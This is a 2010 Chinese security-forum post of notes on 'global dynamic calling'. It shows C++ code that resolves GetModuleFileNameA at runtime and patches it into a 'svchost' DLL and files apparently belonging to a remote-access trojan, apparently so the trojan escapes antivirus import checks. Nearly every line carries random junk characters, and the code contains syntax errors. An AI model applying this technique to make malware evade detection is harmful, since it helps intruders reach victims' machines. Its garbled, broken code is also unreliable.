Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记
3 E; A+ H/ o$ d% ~1 N& @! Zsvchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h" u9 N. V" b8 j9 G: E& v
----------------------------------------2 b. J7 i% p9 K9 N) u5 }' q8 y
DTDY.h:
2 Y1 K' {6 e) e' c2 s
5 [2 T# S+ Z+ Y#if _MSC_VER>10006 c( R; i( [# i6 m& E6 ^" |
#pragma once  O( U7 ~% c- x0 {( a" r
#endif //_MSC_VER>1000
) c2 N: B' C9 }6 e5 v+ O8 ~#include<windows.h>
& `% v" V" G+ M  H+ i
: P9 }9 i' o3 N0 Ctypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);  u* f3 W" [: q- m$ d  L7 y3 ^. b, w
class DTDY) g0 g( \# m$ }/ `
{
% N: {8 h9 _; K# rpublic:
) C1 M/ [& T5 XDTDY();
7 e$ q  a! Q  J0 H( D" a* @virtual ~DTDY();, _) x0 M- V) ]" \$ j% X, G
public:
4 E7 i" }/ `$ N9 ?2 p3 P' z3 Qstatic pGetModuleFileNameA MyGetModuleFileName;
- |! l* b1 A% Z2 {& s1 tstatic BOOL FunInitiallization();! K7 Y+ b6 ]4 e( P% T
};
' b' I9 e2 u0 H% o; N#endif
: b4 M% `6 J' O. K' `  T/ C: {----------------------------------------" o, [( o' i, b6 B6 _! U
6 T( p( m' t& h& z
DTDY.cpp:/ q) d, |2 D- M9 \4 s

: c( l" D; {, \3 z9 u  m#include "DTDY.h"
! g3 G( L5 ]+ i9 CpGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;- n2 w8 G3 R0 }' r: e# x
DTDY:TDY()
- O3 _2 L5 @* U% C& Y8 z{
6 v8 F( _* K6 K) `}
% q; _$ m! R6 [1 ZDTDY::~DTDY()
" r* X2 C: z# B( L$ m{4 Q  s0 O; v0 w: I- E
}
. h" d5 ~' ]/ h0 T+ MBOOL DTDY::FunInitiallization()- {$ h8 d/ o- @" d
{
; y, ^' a& A. r6 [4 |. [6 m+ }; ?& pHMODULE hModule=LoadLibrary("kernel32.dll");
; {3 X7 ~5 P& _( Y  i8 `" r* ?MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
7 o9 k  O* L2 v8 q, W5 K7 dif(!MyGetModuleFileName=) return FALSE;3 [( L/ Z. Z! ~( N3 z" K' U# Y

9 b$ t$ q9 ~3 |. m* ]5 g" Dreturn TRUE;
. p0 y, p; [" ~% s. M$ Z2 b}
8 D3 X' I% D5 x* i- N; |6 P----------------------------------------6 f/ p/ [8 j: E5 l' D
svchost.cpp:
$ o. e" z3 o" ]4 ?6 @$ M  E
3 ?$ d4 e* f1 @0 t9 R8 [#include "DTDY.h"
5 l8 |5 {$ r9 o- i! _
! Z1 c) d- }% L; W7 {2 M1 M6 fBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)2 z7 X. s2 r0 w
{, D8 x. p1 P% m5 m; F8 @
switch(ul_reason_for_call)
# o) L$ T$ v( S{; b: ]- U& b2 i8 v
case DLL_PROCESS_ATTACH:. a; [& d8 h. o' {$ w. j
if(!DTDY::FunInitiallization()) return FALSE;
! p& @, ?; e  Y5 }; p) j
' d4 L# z9 L3 M$ n2 r4 B& ~break;! l9 Z8 k  S. m, Z. m  A2 @6 Q& P
}
: R2 L) Z8 K* w: m1 |* a}
4 G- a. X0 R. a6 \  M, h) F5 |+ p$ I3 o* k7 U; i! M6 S
8 N0 m+ c7 O. U
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
8 Q  b( O4 k( o6 L6 T: ?  V改写为- }& k% O. Z: S' S& I( M
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
; X4 }2 H& d  C----------------------------------------6 D3 n7 Z1 U  p, P: n
KernelManager.cpp:- k. K/ T" Q; o3 j1 b" u
9 t+ F* G% N4 j( _7 u2 A. [
#include "../DTDY.h"
. ~3 H) i6 k/ U5 b5 zGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));7 `# f& m6 t1 r5 J4 m- B
改写为
3 Y! N* m+ x4 ~/ E4 `! P% I+ _DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
4 W% e( K, D4 s/ X& r----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2